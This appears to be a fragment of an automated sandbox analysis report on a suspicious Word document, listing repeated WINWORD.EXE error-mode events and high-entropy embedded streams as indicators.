Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PO NAHK22012FA000000.docx Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRD0000.tmp.0.dr Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr Stream path '_1791189376/CONTENTS' entropy: 7.98640213683 (max. 8.0)
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs